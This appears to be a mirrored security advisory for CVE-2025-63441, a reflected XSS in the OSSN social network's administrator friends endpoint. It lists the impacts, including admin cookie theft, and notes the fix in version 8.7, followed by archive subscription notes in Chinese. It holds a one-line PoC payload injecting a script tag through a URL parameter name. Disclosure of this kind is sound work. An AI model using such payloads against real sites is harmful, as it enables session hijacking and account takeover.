关联漏洞
介绍
# CVE-2025-63441
**Title:**
Reflected XSS via `arbitrarily supplied URL parameter param` at endpoint `u/administrator/friends`
**Summary:**
A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the u/administrator/friends endpoint of the OSSN application.
This vulnerability allows attackers to inject malicious scripts the name of an arbitrarily supplied URL parameter.
**Impact:**
- Perform virtual defacement of the web site.
- Carry out any action that the user is able to perform.
- Redirecting the user to a competing site.
- Capture the user's(admin) session cookie.
Fixed in OSSN 8.7 and above
**github:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2501
**PoC:**
Payload: ?tcjz4'><script>alert(origin)<%2fscript>fefyj=1
<img width="1918" height="962" alt="image" src="https://github.com/user-attachments/assets/9843e99d-5623-47d7-ac68-1a21b2e70f8f" />
文件快照
[4.0K] /data/pocs/0913e802f3cef838e009ed37cf57c8240c522f25
└── [ 920] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →